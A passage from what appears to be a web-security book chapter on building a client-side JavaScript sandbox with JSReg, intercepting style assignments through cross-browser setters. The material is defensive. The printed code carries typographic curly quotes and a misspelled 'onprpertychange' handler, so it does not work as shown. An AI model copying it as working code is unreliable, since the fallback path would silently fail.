node.style[cssProp] = safeCSS;
}
})(node, cssProp)
});
} else if(Object.__defineSetter__) {
styles.__defineSetter__(‘$‘+cssProp+‘$', (function(node, cssProp) {
return function(val) {
var hyphenProp = cssProp.replace(/([A-Z])/g,function($0,$1) {
return ‘-’ + $1.toLowerCase();
});
var safeCSS = CSSReg.parse(hyphenProp+':’+val).replace(new RegExp(‘ˆ‘+hyphenProp+‘[:]’),’').replace(/;$/,’');
node.style[cssProp] = safeCSS;
}
})(node, cssProp));
} else {
document.getElementById(‘styleObjs’).appendChild(styles);
node.$style$ = styles;
node.$style$.onprpertychange = (function(node) {
return function() {
if(/ˆ[$].+[$]$/.test(event.propertyName)) {
var cssProp = (event.propertyName+‘’).replace(/ˆ[$]|[$]$/g,’');
var hyphenProp = cssProp.replace(/([A-Z])/g,function($0,$1) {
return ‘-’ + $1.toLowerCase();
});
var safeCSS = CSSReg.parse(hyphenProp+':’+event.srcElement[event.propertyName]+‘’).replace(new RegExp(‘ˆ‘+hyphenProp+‘[:]’),’').replace(/;$/,’');
node.style[cssProp] = safeCSS;
}
}
})(node);
}
}
The onpropertychange event suffers the same problem. This element can be used in both instances to provide a reliable setter assignment and cross-browser compatibility. The next code sample shows how to use these pieces together and form your cross-browser setters independently of the DOM API. We will create an object, assign it a styles property, and then intercept any assignments.
<body>
<script type=“text/javascript” src=“http://jsreg.googlecode.com/svn-history/r62/trunk/JSReg/JSReg.js”></script>
<script>
window.onload=function() {
var obj = {};
var parser=JSReg.create();
var styles = document.createElement(‘span’);
if(Object.defineProperty) {
obj.$styles$ = styles;
Object.defineProperty(obj.$styles$, ‘$color$', {set: function(val) {alert(‘Intercepted:’+val);}});
} else if(Object.__defineSetter__) {
styles.__defineSetter__(‘$color$', function(val) {
alert(‘Intercepted:’+val);
});
} else {
document.body.appendChild(styles);
obj.$styles$ = styles;
obj.$styles$.onpropertychange = function() {
if(event.propertyName == ‘$color$’) {
alert(‘Intercepted:’+event.srcElement[event.propertyName]);
}
}
}
obj.$styles$ = styles;
parser.extendWindow(‘$obj$', obj);
parser.eval(“obj.styles.color=123”);
}
</script>
</body>
The code sample shows how to intercept the assignment styles.color to the obj we created. Styles is created using a span and is assigned as a property of our object obj. We then test for defineProperty; if it is available, we assign a sandboxed $styles$ property to the span element we created. Then we create a setter using the “fake” styles (the span element); the setter looks for $color$. Normally, the setter would be created multiple times for the various different values. The setter function then has one argument, val, which contains the result of the assignment. Next, we check for __defineSetter__. If the browser does not have Object.defineProperty, this process is simpler, as we can just create a setter on our object that mirrors the defineProperty setter. Lastly, the fallback is assuming that the browser is earlier than IE8; here we have to add our span element to the DOM for the onpropertychange event to fire, then assign this reference to our object obj. The syntax is quite different from the previous two examples, as these are actual events that are called. We must check that the assignment is actually our target property $color$, which we do using event.propertyName, and we obtain the value being assigned using event.srcElement[event.propertyName]. The good thing about the fallback is that onpropertychange will not be fired if the browser does not support it, so in the worst-case scenario, the assignment will not occur and the sandboxed property will just be added with no effect on the DOM. Then we add our object to the sandboxed window using extendWindow, which will intercept any assignment to the $color$ property in pretty much every browser, including those earlier than IE7.
Summary
At this point, you should have some insight regarding how to handle untrusted code at the server side and the client side. Using the techniques we discussed in this chapter, you should be able to create a client-side sandbox that takes setter assignments into account. This would be useful for client-side malware analysis, as it would allow you to execute the code, but prevent actual DOM manipulation while still monitoring what has been assigned. If you want to handle untrusted code and include it on your Web site, perhaps accepting code from the user or online advertisements, this chapter should have given you the groundwork and the knowledge to create your own system or implement one correctly. Programmers make mistakes. However, programmers who test and break their own code will produce better-quality code that is more secure than programmers who do not. Learn to think like the bad guys, and you will spot your obvious mistakes.